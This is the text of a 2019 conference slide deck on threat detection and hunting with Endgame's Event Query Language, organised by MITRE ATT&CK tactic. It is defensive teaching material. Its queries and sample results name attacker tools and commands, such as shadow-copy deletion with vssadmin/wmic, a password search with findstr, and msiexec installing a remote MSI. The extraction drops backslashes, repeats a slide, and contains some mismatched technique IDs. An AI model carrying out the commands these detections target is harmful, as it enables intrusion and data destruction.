Circle City Con 2019 and BSides SATX 2019
Abstract:
How do you find malicious activity? We often resort to the cliche, you know it when you see it, but how do you even see it, without drowning in data? MITRE’s ATT&CK knowledge base organizes adversary behavior into tactics and techniques, and orients our approach to endpoint data. It suggests questions that might be worth asking, but not a way to ask them. The Event Query Language (EQL) allows a security analyst to naturally express queries for IOC search, hunting, and behavioral detections, while remaining platform and data source agnostic.
In this talk, I will demonstrate the iterative process of establishing situational awareness in your environment, creating targeted detections, and hunting for the adversary in your environment with real data, queries, and results.
2. 2ENDGAME
chmod +rw bio
Ross Wolf
@rw_access
Threat Researcher at Endgame
- Develop detection frameworks and individual detections
- Developed Event Query Language
- Experience red- and blue-teaming
5. 5ENDGAME
TALK OVERVIEW
• Developing threat-based detections with ATT&CK and your data
• Crash course through Event Query Language
• Follow the trail of a generic threat actor, writing detections for each step
• Explore threat hunting methods to find for the known unknown
• Contribute back to the community
7. 7ENDGAME
DETECTION PROCESS
• Use ATT&CK to identify common behaviors, instead of just tools
• Explore the mind of the attacker
• Understand your data and visibility
• Express detection logic for your platform
• Continuously create, test, and refine analytics
• Atomic Red Team, CALDERA, Red Team Automation, etc.
• Evaluate against human red teams
• Don't be afraid to retire analytics!
https://www.mitre.org/publications/technical-papers/finding-cyber-threats-with-attck-based-analytics
8. 8ENDGAME
ATTACKER TRADECRAFT
• Gain access to establish the initial foothold
• Discover information about the endpoint
• Persist to survive system reboots
• Establish command and control (C2)
• Gain additional privileges and credentials
• Move between hosts and execute commands
• Collect and exfiltrate sensitive information
• Destroy data or negatively impact mission
• All while evading monitoring and protections
ATT&CK Tactics
Initial Access
Execution
Persistence
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Command and Control
Exfiltration
Impact
9. 9ENDGAME
MITRE ATT&CK™ FRAMEWORK
• Knowledge base that organizes behaviors (techniques) by objectives (tactics)
• Most techniques are used by multiple groups and red teams
• Hundreds of references to threat reports
11. 11ENDGAME
KNOW YOUR DATA
• Data originally gathered from Sysmon
• Converted to a common schema
• file, process, network, and registry event monitoring
https://eqllib.readthedocs.io/en/latest/schemas.html
command_line C:WindowsExplorer.EXE
md5 ac4c51eb24aa95b77f705ab159189e24
parent_process_name userinit.exe
parent_process_path C:Windowssystem32userinit.exe
pid 2460
ppid 3052
process_name explorer.exe
process_path C:Windowsexplorer.exe
subtype create
timestamp 131485997150000000
user_domain research
user_name researcher
12. 12ENDGAME
INTRO TO EQL
• Event Query Language is simple and concise
• Schema-independent and OS-agnostic
• Designed for real-time detection with stream processing
• Supports multi-event behaviors, stacking and sifting through data
• Function syntax instead of keyword explosion (e.g. length(field))
13. 13ENDGAME
SIMPLE QUERIES
• Boolean and comparison logic
and or not < <= == != >= >
• Wildcard matching with * character
• String comparisons are case-insensitive
process where process_name == "svchost.exe" and
(command_line != "* -k *" or
parent_process_name != "services.exe")
https://eql.readthedocs.io/en/latest/query-guide
14. 14ENDGAME
SEQUENCES
• Multi-event behaviors with ordering
• Match properties between events with by syntax
• Time limits maxspan=1 hr
• Sequences can be expired with an until condition
sequence with maxspan=5m
[ file where file_name == "*.exe"] by user_name, file_path
[ process where true] by user_name, process_path
15. 15ENDGAME
JOINS
• Match events specified, without time limits
• Supports by and until syntax for additional matching or state
• Unlike SQL, it finds adjacent pairs instead of cross-products
join
[file where file_path == "*System32Tasksh4x0r.xml"]
[registry where registry_path == "*runonceh4xor"]
16. 16ENDGAME
JOINS
join by source_ip, destination_ip
[network where destination_port == 3389] // RDP
[network where destination_port == 135] // RPC
[network where destination_port == 445] // SMB
• Match events specified, without time limits
• Supports by and until syntax for additional matching or state
• Unlike SQL, it finds adjacent pairs instead of cross-products
17. 17ENDGAME
PIPES AND OUTLIERS
• Pipes can be used to transform or reduce output
• Combine in various ways to perform stacking or reduce data set
• count filter head sort tail unique unique_count
process where true
// Remove duplicate pairs
| unique process_name, command_line
// Count per process_name to get unique # of commands
| count process_name
| filter count < 5
18. 18ENDGAME
PROCESS LINEAGE
network where process_name == "powershell.exe"
and not descendant of
[process where process_name == "explorer.exe"]
• Natively tracks process lineage by monitoring create/terminate events
• Supports descendant of, child of, and event of
• Combine with other boolean logic
19. 19ENDGAME
• Natively tracks process lineage by monitoring create/terminate events
• Supports descendant of, child of, and event of
• Combine with other boolean logic
PROCESS LINEAGE
file where file_name == "*.exe"
and event of [process where child of
[process where process_name == "powershell.exe"]]
21. 21ENDGAME
APPROACH TO DETECTION
• Understand common tactics employed by the adversary
• Next, move to specific methods or techniques
• From there we can craft detection logic
• When necessary, understand operating system internals
Initial Access
Execution
Persistence
Privilege Escalation
Command and Control
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Impact
22. 22ENDGAME
INITIAL ACCESS & EXECUTION
• Technique Spearphishing Attachment (T1193)
PowerShell (T1086)
• Detection Scriptable child processes of Office products
- PowerShell, VB script, cmd.exe
process where
parent_process_name in ("winword.exe", "excel.exe", "powerpnt.exe")
and process_name in ("powershell.exe", "cscript.exe",
"wscript.exe", "cmd.exe")
Initial Access
Execution
Persistence
Privilege Escalation
Command and Control
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Impact
23. 23ENDGAME
INITIAL ACCESS & EXECUTION
• Technique Spearphishing Attachment (T1193)
• Detection Office creating a PE file that quickly executes
sequence with maxspan=5m
[file where file_name == "*.exe"
and process_name in ("winword.exe", "excel.exe", "powerpnt.exe")
] by file_path
[process where true] by process_path
Initial Access
Execution
Persistence
Privilege Escalation
Command and Control
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Impact
24. 24ENDGAME
PERSISTENCE &
PRIVILEGE ESCALATION
• Technique Scheduled Task (T1053)
• Detection The API is cumbersome, so many tools directly
execute schtask.exe. Look for non-SYSTEM
users creating tasks that run as SYSTEM
process where process_name == "schtask.exe"
and user_name != "SYSTEM"
and (command_line == "* /ru system" or
command_line == '* /ru "nt authority"')
| unique user_name, command_line
Initial Access
Execution
Persistence
Privilege Escalation
Command and Control
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Impact
25. 25ENDGAME
network where not destination_port in (
1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,
49,5370,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,
113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,
254,255,256,259,264,280,301,306,
/* many more? */)
| unique destination_address, destination_port
COMMAND AND CONTROL (C2)
• Techniques Uncommonly Used Port (T1065) Initial Access
Execution
Persistence
Privilege Escalation
Command and Control
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Impact
26. 26ENDGAME
• Techniques Outgoing Connection from Abusable Process (T???)
• Detection Look for network from abusable binaries
Continuously tune to your environment
COMMAND AND CONTROL (C2)
Initial Access
Execution
Persistence
Privilege Escalation
Command and Control
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Impact
sequence by pid
[process where subtype.create]
[network where process_name in ( // known LOLBINS
"powershell.exe", "mshta.exe", "installutil.exe",
"msxsl.exe", "rundll32.exe")
| unique events[0].process_path, events[1].destination_address,
events[1].destination_port
27. 27ENDGAME
DEFENSE EVASION
• Technique Masquerading (T1096)
• Detection Look for executables matching names of known
Windows binaries from system32, but in the
wrong directory
process where process_name in (
"csrss.exe", "dllhost.exe", "lsass.exe",
"lsm.exe", "services.exe", "winlogon.exe",
/* etc */
) and not (process_path == "C:windowssystem32*" and
process_path != "C:windowssystem32*")
Initial Access
Execution
Persistence
Privilege Escalation
Command and Control
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Impact
https://www.endgame.com/blog/how-hunt-masquerade-ball
28. 28ENDGAME
DEFENSE EVASION
• Technique Process Injection (T1096)
Process Hollowing (T1093)
• Detection Look for process creations from the wrong parent
process where
(process_name == "lsass.exe" and parent_process_name != "wininit.exe") or
(process_name == "LogonUI.exe" and
not parent_process_name in ("winlogon.exe", "wininit.exe")) or
(process_name == "services.exe" and parent_process_name != "wininit.exe") or
(process_name == "svchost.exe" and parent_process_name != "services.exe" and
// the system32svchost.exe executes syswow64svchost.exe for 32-bit DLLs
not (parent_process_path == "*system32svchost.exe" and
process_path == "*syswow64svchost.exe"))
Initial Access
Execution
Persistence
Privilege Escalation
Command and Control
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Impact
29. 29ENDGAME
CREDENTIAL ACCESS
• Technique Access Sensitive Data or Credentials in Files (T1087)
• Detection Look for commands to search for "password"
process where process_name == "findstr.exe"
and command_line == "*password*"
| unique parent_process, command_line
Initial Access
Execution
Persistence
Privilege Escalation
Command and Control
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Impact
30. 30ENDGAME
DISCOVERY
• Technique Account Discovery (T1087)
Remote System Discovery (T1096)
System Account Discovery (T1033)
• Detection Look for any users that run multiple different
types of discovery commands
join by user_name
[process where process_name in
("ipconfig.exe", "hostname.exe", "whoami.exe")]
[process where process_name == "net.exe" and
(command_line == "*group*" or command_line == "* user*")]
[process where process_name in ("tasklist.exe", "qprocess.exe", "sc.exe")]
| unique user_name
Initial Access
Execution
Persistence
Privilege Escalation
Command and Control
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Impact
31. 31ENDGAME
LATERAL MOVEMENT
• Technique Windows Remote Management (T1028)
PowerShell (T1086)
• Approach Look for incoming WinRM connections with
execution of the provider
sequence with maxspan=2s
[network where destination_port in (5985, 5986) and
process_name == "svchost.exe"]
[process where process_name == "wsmprovhost.exe" and
command_line == "*embedding*"]
| unique events[0].source_address,events[0].destination_address,
events[1].user_name
Initial Access
Execution
Persistence
Privilege Escalation
Command and Control
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Impact
32. 32ENDGAME
COLLECTION & EXFILTRATION
• Technique Data Staged (T1074)
Data Compressed (T1072)
Data Encrypted (T1022)
• Detection Look for known command lines for tools that
indicate compression and encryption
Initial Access
Execution
Persistence
Privilege Escalation
Command and Control
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Impactsequence by unique_pid with maxspan=5m
[process where command_line == "* -hp*" or command_line == "* /hp*"]
[file where file_name == "*.rar"]
| unique events[0].process_path, events[1].file_name
33. 33ENDGAME
IMPACT
• Technique Inhibit System Recovery (T1490)
• Detection Monitor known command lines
process where
(process_name == "vssadmin.exe" and
command_line == "*delete*") or
(process_name == "wmic.exe" and
command_line == "*shadow*delete*") or
(process_name == "wevtutil.exe" and command_line == "* cl *")
Initial Access
Execution
Persistence
Privilege Escalation
Command and Control
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Impact
37. 37ENDGAME
APPROACHES
• We want to look proactively for evidence of an adversary
• Often technique-agnostic, but still follow attacker lifecycle
• Ask environment-oriented questions
• Establish situational awareness and track deviations
• Prevalence
• Recency
• Patterns
is this threat hunting?
736c963c78ed5b4587f36ca6f70dfbcb
38. 38ENDGAME
UNUSUAL
PARENT-CHILD
RELATIONSHIPS
What parent-child process
relationships are rare and
recent?
process where subtype.create
| unique_count parent_process_name, process_name
| tail 100
| sort count
| head 10
parent_process_name command_line
MSI9BBF.tmp
"C:Program Files (x86)Common FilesJavaJava
Updatejaureg.exe" -u auto-update
powershell.exe
rundll32.exe
C:UsersvagrantAppDataLocalcyzfc.dat,
PointFunctionCall
wuauclt.exe
"C:WINDOWSSoftwareDistributionDownload
InstallAM_Delta_Patch_1.293.2420.0.exe" WD
/q
AM_Delta_Patch_
1.293.2420.0.exe
C:WINDOWSsystem32MpSigStub.exe /stub
1.1.1 ...
39. 39ENDGAME
UNUSUAL
PARENT-CHILD
RELATIONSHIPS
What parent-child process
relationships are rare and
recent?
process where subtype.create and (
process_name in ("cmd.exe", "powershell.exe")
or parent_process_name in
("cmd.exe", "powershell.exe"))
| unique_count parent_process_name, process_name
| tail 100
| sort count
| head 10
parent_process_name command_line
powershell.exe
rundll32.exe
C:UsersvagrantAppDataLocalcyzfc.dat,
PointFunctionCall
40. 40ENDGAME
REMOTE ACCESS
TOOLS
What recently first-seen
processes also made
network connections?
process_name command_line
InstallUtil.exe
C:WindowsMicrosoft.NETFramework64v4.0.30319
InstallUtil.exe /logfile= /LogToConsole=False /U
mydotnet.exe
OneDriveSetup.exe
"C:UsersdeveloperAppDataLocalMicrosoftOneDrive
UpdateOneDriveSetup.exe" /update /restart
OfficeClickToRun.exe
"C:Program FilesCommon FilesMicrosoft
SharedClickToRunUpdates16.0.11601.20230
OfficeClickToRun.exe" /update
join by process_path
[process where subtype.create]
[network where true]
| unique events[0].process_path
| tail 50
i'm in
41. 41ENDGAME
SUDDEN
EXTROVERTS
What processes have
been seen before, but
only recently made
network activity?
command_line
msiexec.exe /quiet /i http://172.31.27.16:8000/bin/Installer.msi
sequence by process_path
[process where timestamp_utc < "2019-05-01"]
[network where timestamp_utc > "2019-05-17"]
until
[network where timestamp_utc < "2019-05-17"]
| unique process_path
42. 42ENDGAME
FILE SYSTEM
WEAKNESSES
What privileged files
were modified by a
user and but executed
SYSTEM?
user_name process_name file_path
vagrant jusched.exe C:Windowssystem32infsvchost.exe
zoom CptInstall.exe
C:Program Files (x86)Common
FilesZoomSupportCptService.exe
sequence
[file where subtype.create and
file_name == "*.exe" and
user_name != "SYSTEM"] by file_path
[process where user_name == "SYSTEM"] by process_path
| unique events[0].file_path
43. 43ENDGAME
REMOTE
RECONNAISSANCE
What enumeration
commands were
executed from processes
with outgoing network
activity?
command_line process_name count
whoami.exe powershell_ise.exe 1
hostname.exe dxdiag0732.exe 1
netstat.exe python.exe 1
process where process_name in (
"whoami.exe", "hostname.exe", "ipconfig.exe",
"net.exe", "netstat.exe", "tasklist.exe"
) and child of [network where subtype.outgoing]
| unique parent_process_path, process_name
| unique_count parent_process_path
*slaps eql*
this hunt can find so
many recon commands
44. 44ENDGAME
BRUTE FORCE
ATTEMPTS
Are there multiple
logon failures and
eventually a success
from a remote host?
sequence by ip_address with maxspan=1h
[security where event_id == 4625
and logon_type in (3,5,10)]
[security where event_id == 4625
and logon_type in (3,5,10)]
[security where event_id == 4625
and logon_type in (3,5,10)]
[security where event_id == 4625
and logon_type in (3,5,10)]
[security where event_id == 4624
and logon_type in (3,5,10)]
until
[security where event_id == 4624] // success
4624 – failure
4625 - success
45. 45ENDGAME
WHYMI HERE?
What commands were
spawned from WMI
remotely or as a
different user?
process where subtype.create
| unique authentication_id
| filter not user_name in
("SYSTEM", "NT AUTHORITY", "LOCAL SERVICE") and
(process_name == "wmiprvse.exe" or parent_process_name == "wmiprvse.exe")
| unique process_name
command_line
cmd /c "tasklist /svc >
%SystemRoot%TEMPnessus_task_listIVC4798D.TMP &
ren %SystemRoot%TEMPnessus_task_listIVC4798D.TMP
nessus_task_listIVC4798D.TXT"
recdiscm32.exe 10.1.2.3admin$system32taskchg16.exe
45ENDGAME
WHYMI HERE?
What commands were
spawned from WMI
remotely or as a
different user?
process where subtype.create
| unique authentication_id
| filter not user_name in
("SYSTEM", "NT AUTHORITY", "LOCAL SERVICE") and
(process_name == "wmiprvse.exe" or parent_process_name == "wmiprvse.exe")
| unique process_name
command_line
cmd /c "tasklist /svc >
%SystemRoot%TEMPnessus_task_listIVC4798D.TMP &
ren %SystemRoot%TEMPnessus_task_listIVC4798D.TMP
nessus_task_listIVC4798D.TXT"
recdiscm32.exe 10.1.2.3admin$system32taskchg16.exe
46. 46ENDGAME
SUSPICIOUS
LATERAL
MOVEMENT
What endpoints remotely
connected via SMB and
RPC to potentially upload
and execute?
sequence by destination_address
with maxspan=30s
[network where subtype.incoming
and destination_port == 445]
[network where subtype.incoming
and destination_port == 135]
| unique source_address
• Noisy on domain controllers
• Incoming traffic to workstations
is suspicious
48. 48ENDGAME
DOWNLOAD EQL
• Install the python package (supports 2.7, 3.4+) with pip install eql
• Built in CLI eql query with stdin/stdout redirection
• Read the Getting Started blog post for more information
• endgame.com/blog/technical-blog/getting-started-eql
50. 50ENDGAME
ANALYTICS LIBRARY
• Browse the analytics library
• eqllib.readthedocs.io
• Contribute your detection and hunting logic
• github.com/endgameinc/eqllib
• 45+ analytics mapped to MITRE ATT&CK with
contributions from Endgame and Red Canary
• Multiple data sets to get your hands dirty
• github.com/endgameinc/eqllib/tree/master/data
52. 52ENDGAME
NORMALIZATION
• Contribute schema mappings
• Currently map to Microsoft Sysmon and MITRE Cyber Analytics Repository
• Convert queries to mapped data sources
$ eqllib convert-query -s "Microsoft Sysmon" 'process where subtype.create and
process_name == "mshta.exe" and command_line == "* c:programdata*.hta"'
process where EventId == 1 and Image == "*mshta.exe"
and CommandLine == "* c:programdata*.hta"
• Normalize from mapped data sources to sharable format
53. 53ENDGAME
WHAT'S NEXT?
• Early June update to EQL 0.7
• Contains a schema validation with better error checking
• Cleaner python API for integrating with other projects
• Summer release of 75+ atomic analytics mapped to ATT&CK
54. 54ENDGAME
GET IN TOUCH
• Follow EQL on Twitter
• @eventquerylang
• Chat on Gitter
• gitter.im/eventquerylang/community
• Email us
• eql AT endgame.com
55. 55ENDGAME
RESOURCES
• Getting started with EQL (blog)
• endgame.com/blog/technical-blog/getting-started-eql
• Endgame Guide to Threat Hunting (PDF)
• pages.endgame.com/wc-guide-to-threat-hunting.html
• Follow the guide for creating sophisticated queries
• eql.readthedocs.io/query-guide
• Documentation
• eql.readthedocs.io
• Clone it!
• github.com/endgameinc/eql
• github.com/endgameinc/eqllib